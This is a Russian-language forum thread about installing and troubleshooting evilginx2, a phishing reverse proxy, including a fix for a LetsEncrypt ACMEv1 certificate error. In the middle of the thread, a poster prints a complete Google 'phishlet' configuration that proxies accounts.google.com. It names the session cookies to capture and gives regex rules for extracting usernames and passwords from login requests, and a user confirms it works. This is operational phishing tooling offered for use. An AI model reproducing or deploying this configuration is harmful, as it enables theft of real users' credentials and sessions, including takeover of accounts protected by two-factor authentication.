Evilginx2 -- SSL сертификат и ACMEv2

Эту ошибку исправили давно, четыре месяца назад — 11 октября 2019 года в версии evilginx2 2.3.2. То есть просто переустановите evilginx2 на новую и всё должно заработать. Инструкция по установке есть здесь: https://kali.tools/?p=4761

Здесь можно посмотреть журнал изменений: https://github.com/kgretzky/evilginx2/blob/master/CHANGELOG

2.3.3

• Fixed: Multiple concurrent map writes when whitelisting IPs during heavy loads.

2.3.2

• ACMEv2 support added to comply with LetsEncrypt requirements. - добавлена поддержка ACMEv2 для соблюдения требований LetsEncrypt
• Fixed session cookie output to support EditThisCookie on the latest Chrome version.
• Increased timeouts for proxying HTTP packets to 45 seconds.
• Added support for Go modules.

Спасибо большое! Но если ставить по инструкции на kali tools то он ставит 2.3.0.  А может быть такое что надо компилировать чтобы поднять версию? Installing from source ---> Instructions above can also be used to update evilginx2 to the latest version.  а если Installing from precompiled binary packages ---> то ссылка ведет на 2.3.0 zip. Простите я может что-то упускаю.


Вы всё верно заметили, поскольку установка делается из предварительно скомпилированного файла со страницы https://github.com/kgretzky/evilginx2/releases , а там, как можно увидеть, автор не выкладывает новые файлы.

Сейчас добавлю инструкцию по установке из исходного кода — в этом случае установится последняя версия. После этого ещё раз напишу здесь на форуме.

Всё готово, сюда: https://kali.tools/?p=4761 добавил новые команды — перейдите к разделу «Установка из исходного кода».

Ещё раз спасибо, что обратили внимание на проблему — до меня не сразу дошло, что автор забыл выложить исполнимые файлы для последних релизов.

Спасибо большое!

Простите пожалуйста тут еще один момент - Может я ошибаюсь но дорога теперь чтобы загружать дополнительные фишлеты другая, если версия 2.3.0.  команда mv phishlets-master/* phishlets/ работала то с версией 2.3.3  нет.  Они вроде как теперь хранятся тут /usr/share/evilginx/phishlets/    Но вопрос в другом я в дополнительный phishlets поставил Google но он категорически отказывался запускаться. В readme я нашел что для google нужно чтобы домен был американский,  если я не ошибаюсь стояла гораздо ниже версия Evilginx двухлетней давности, и что -то про прокси но предложение на половине обрывается. Я так понимаю если старая версия Evilginx будет проблема с LetsEncrypt.  Есть какая нибудь возможность решить эту проблему? Спасибо

Да, при установке из исходного кода фишлеты хранятся по пути /usr/share/evilginx/phishlets.

Для Google я видел только фишлеты в формате старой версии evilginx2. Думаю, проблема именно в несовместимости версий, а не в домене.

Сам я не вникал в разработку фишлетов, поэтому не могу помочь. Нужно или искать актуальный для Google или просить сообщество сделать.

Кстати, есть не принятый запрос на внесение изменения в код: https://github.com/kgretzky/evilginx2/pull/315

Среди прочего, там создаётся файл phishlets/google.yaml со следующим содержимым:

name: 'google'
author: '@GregorioSecurity'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
  - {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: true, is_landing: false}
sub_filters:
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="://{hostname}', replace: 'href="https://ssl.{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
auth_tokens:
  - domain: '.google.com'
    keys: ['SID', 'HSID', 'SSID', 'APISID', 'SAPISID', 'NID','CGIC','SNID', 'LSID','1P_JAR',]
  - domain: 'accounts.google.com'
    keys: ['GAPS', 'LSID']	
credentials:
  username:
    key: 'f.req'
    search: '\[*\[\"(.+?)\"'
    type: 'post'
  password:
    key: 'f.req'
    search: '\[.*\[\"(.+?)\"'
    type: 'post'
login:
  domain: 'accounts.google.com'
  path: '/signin/v2/identifier'
  path: '/ServiceLogin/identifier'

Сам я не тестировал, но есть шанс, что заработает.

Опять большое вам спасибо! Все заработало.

Hi,

I want to take a moment and say thank you for this great info.

Did the phishlet work as intended ?

Thank you for your response

Hello i did all the step of install and i steal have

ERROR 403  - urn: acme: error: unauthorized - Account creation on ACMEv1 is disabled. Please upgrade your ACME client to a version that supports ACMEv2 / RFC 8555

1- I use Digitaloceans server

2-I got my domain in freenom.com

@rayanv4, for installation please consider the following article: ‘How to install evilginx2 (and how to fix ‘urn: acme: error: unauthorized - Account creation on ACMEv1 is disabled’)’.